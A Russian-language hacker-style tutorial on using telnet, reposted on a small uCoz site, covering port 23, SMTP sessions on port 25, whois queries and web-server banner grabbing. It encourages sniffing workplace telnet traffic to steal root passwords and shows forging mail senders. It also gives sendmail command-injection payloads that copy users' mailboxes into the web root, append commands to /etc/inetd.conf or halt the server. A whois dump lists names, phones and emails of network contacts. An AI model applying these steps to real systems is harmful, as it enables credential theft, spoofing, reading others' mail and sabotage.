doc.3dn.ru
Воскресенье, 22.12.2024, 21:22
Приветствую Вас Гость | RSS
 
Главная Каталог статейРегистрацияВход
Меню сайта
Категории каталога
Linux [29]
*nix дистрибутивы [10]
Полезные Советы [71]
Мобильные устройства [19]
Windows [24]
Сервера [19]
Безопасность [6]
Дизайн [22]
В помощь WEB-мастеру [16]
Развлечения [18]
Наш опрос
Нужны ли на сайте видео уроки по Flash?
Всего ответов: 489


Главная » Статьи » Linux

Учимся использовать Telnet
Учимся использовать Telnet

Часть первая. Хочу но не могу.
Зачастую меня спрашивают, "Как типа телнет поюзать?" Гммм, ну начнем с того что "телнет" в привычном понимании - это всего лишь терминал, который позволяет несчастному юзеру стать клиентом какого-нибудь сервиса завязанного на TCP/IP. Соответственно, для начала нужно определиться, куда нам нужно и нужно ли нам это... Часто задаваемый вопрос номер два, а где мне взять телнет клиента(терминал)? Ну большинство начинающих странников (от слова странный) даже не догадываются о том, что телнет клиент уже стоит на машине) вызовите командную строку дос и наберите там telnet (при условии, что вы уже подключены в сеть). Добрый windows порадует вас на редкость кривым клиентом, не имеющим возможности настройки типа терминала.Гораздо более приятно пользоваться универсальным клиентом SecureCRT (http://www.vandyke.com).Если у тебя стоит Linux или BSD ,то ты уже достиг могущества и тебе осталось в X`ах вызвать консоль и набрать telnet.
Коннект производится так:
telnet hostname/IP port
Где hostname/IP - имя хоста/IP на который ты решил повеситься, port - номер порта, через который ты собрался иметь удаленную систему.

Часть Вторая. Безвозвратно погибшее прошлое.
Итак для чего изачально был нужен этот чудо терминал? Для коннекта на порт 23, который использует UNIX telnetd, то бишь телнетный демон. В результате, после ввода имени пользователя и пароля ты вываливаешся прямо в shell и можешь управлять (с правами назначенными тебе админом) удаленной машиной так же, как будто ты сидишь непосредственно за ней. Но в сем сервисе было столько багов, что умные люди его давно пофиксили и перешли на SSH. Основная проблема в том, что юзер, нюхающий траффик в локалке по 23 порту может без проблем прочитать админовские login&password (никакого шифрования) сплошной plain text. БРРРРРР. Но если ты, находясь в локальной сети своей организации, набрал telnet servername и увидел нечто типа:
Linux RedHat 6.0
login
Значит ты теперь можешь смело включать сниффер на 23 порт и ловить пакетики. Ну за один рабочий день ты наверняка получишь рутовый логин и пароль.

Часть Третья. SendMail зачастую все еще дыряв.
Гммм. Ну нафига нам сперся 23 порт? Попробуем поиметь через 25, то бишь sendmail.
Выглядит это примерно так:
telnet hostname 25
Trying 194.68.13.231...
Connected to gwx3.host.ru.
Escape character is '^]'.
220 gwx3.host.ru ESMTP Sendmail 8.9.3/8.9.3; Tue, 1 Aug 2000 08:54:59 +0400

УРА ты повесился напрямую на 25 порт что дальше? Дальше поздороваемся:

HELO domainname.com

(кстати имя домена может быть любое, но желательно реально существующее к примеру YAHOO.COM)
далее пишем от кого письмо:

mail from : billgates@microsoft.com - вот тебе и анонимность ....)))

теперь кому:

rcpt to : username

username - имя юзера которому шлем мыло, root - есть всегда)))))
ну теперь сама мессага:

data - жмем Enter
здесь печатаем текст.

для того чтобы закончить послание ставим .(точку) и жмем Enter

quit - валим отсюда))

ВСЕ!!! мы только что отправили вполне анонимное мыло без всяких там клиентов)))
Радость в том ,что , зачастую, в sendmail есть следующие баги:
1. mail from : sendername|any_command_as_U_want - возможность выполнения любой UNIX команды
rcpt to : username|any_command_as_U_want - возможность выполнения любой UNIX команды
2. rcpt to : /any_directory/any_filename - возможность направить мессагу напрямую в файл)))
Один гражданин ,назвавший себя VIRUSMAN недавно прислал письмо где был следующий вопрос:
"А что мне это дает?" Ну что я могу сказать .........
В первом случае можно сделать нечто типа:
/bin/ls /var/spool/mail>/home/httpd/html/users_info.txt - получаем список почтовых юзерей
/bin/cat /var/spool/mail/username>/home/httpd/html/user_box.txt - получаем контент ящика юзера.
/bin/echo any_commands_here>>/etc/inetd.conf - добавляем произвольные команды в конец инет демона)).
/sbin/halt - паркуем сервак))) и т.д....

Во втором случае ...)))
Ну попробуй подумать, пиши что хочешь и куда хочешь))) Можно дописать произвольные команды скажем в /etc/inetd.conf ... все зависит от твоей фантазии.


Часть четвертая, прикладная пауза.
Ты конечно уже юзал проги которые определят провайдера по IP)) Срочно сотри их, больше никогда не юзай - вспомни про http://www.ripe.net.

На RIPE.NET запросы делаются так:

telnet whois.ripe.net 43
Trying 193.0.0.129...
Connected to whois.ripe.net.
Escape character is '^]'.
194.87.0.50 - пишем айпишник и получаем подробную инфу кто это и откуда.
% Rights restricted by copyright.
See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 194.87.0.0 - 194.87.3.255
netname: DEMOS-CORP
descr: DEMOS Corporate Network
descr: Demos Plus Co. Ltd.
descr: Moscow, Russia
country: RU
admin-c: PA75
tech-c: ED12-RIPE
tech-c: GB90-RIPE
tech-c: GK41-RIPE
status: ASSIGNED PA
mnt-by: AS2578-MNT
changed: eugen@demos.net 19970313
changed: galka@demos.net 19990804
source: RIPE

route: 194.87.0.0/19
descr: DEMOS
origin: AS2578
notify: noc@demos.net
mnt-by: AS2578-MNT
changed: eugen@demos.net 19970627
source: RIPE

person: Paul Antonov
address: Demos Plus Ltd.
address: Ovchinnikovskaya nab. 6/1
address: Moscow 113035
address: Russia
phone: +7 095 9566233
phone: +7 095 9566234
fax-no: +7 095 9565042
e-mail: apg@demos.net
nic-hdl: PA75
changed: apg@demos.net 19960618
source: RIPE

person: Evgeny R Didenko
address: Demos-Internet JSC
address: 6-1 Ovchinnikovskaya nab.
address: Moscow 113035
address: Russia
phone: +7 095 737-0436
phone: +7 095 737-0400
fax-no: +7 095 233 5016
e-mail: eugen@demos.net
nic-hdl: ED12-RIPE
notify: eugen@demos.net
changed: eugen@demos.net 19960415
changed: eugen@demos.net 19991230
source: RIPE

person: Gera V Bragin
address: Demos Company Ltd.
address: 6-1 Ovchinnikovskaya nab.
address: Moscow 113035
address: Russia
phone: +7 095 737 0436
phone: +7 095 737 0400
fax-no: +7 095 956 5042
e-mail: gera@demos.net
nic-hdl: GB90-RIPE
notify: gera@demos.net
changed: gera@demos.net 19970105
changed: galka@demos.net 19991104
source: RIPE

person: Galina Kovalenko
address: Genesys Telecommunications Lab.
address: 11, 2nd Obydenskiy pereulok
address: Moscow 119034
address: Russia
phone: +7 095 255 7940
fax-no: +7 095 255 7941
e-mail: galka@genesyslab.ru
nic-hdl: GK41-RIPE
remarks: +7 095 255 7940 ext 2051
notify: galka@genesyslab.ru
changed: galka@genesyslab.ru 20000731
source: RIPE
Connection closed by foreign host.

Часть пятая,  узнаем версию веб-сервера и установленного на нем ПО.
Узнать данную информацию, если у вас установлен веб-сервер Apache может практически любой человек. Для этого есть различные способы, но самый простой метод заключается в использовании telnet подключения на порт 80 удаленного сервера и запроса "HEAD / HTTP/1.0” :

telnet remote_server.com 80 
Trying remote_server.com... 
Connected to remote_server.com. 
Escape character is '^]'. 
HEAD / HTTP/1.0 <- after this press 2 times ENTER 
HTTP/1.1 200 OK Date: Fri, 09 Jun 2006 08:18:06 GMT 
Server: Apache/2.0.55 (Debian) PHP/5.1.2-1+b1 mod_ssl/2.0.55 OpenSSL/0.9.8b 
Connection: close 
Content-Type: text/html; charset=UTF-8 
Connection closed by foreign host.

Как вы можете увидеть выше, простой командой мы узнали довольно много информации о удаленном сервере: Debian в качестве ОС, , Apache 2.0.55 в качестве веб-сервера, PHP 5.1.2, и OpenSSL 0.9.8b… Хммм, а не слишком ли он разговорчив? В следующих статьях я покажу как можно скрыть данную информацию о системе.

Источник: http://www.inattack.ru
Категория: Linux | Добавил: doc (28.10.2009) | Автор: doc
Просмотров: 13256 | Рейтинг: 4.0/3 |

Всего комментариев: 0

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Форма входа

Поиск
Друзья сайта
www.work-zilla.com
Статистика
Онлайн всего: 1
Гостей: 1
Пользователей: 0


Copyright MyCorp © 2024
Бесплатный хостинг uCoz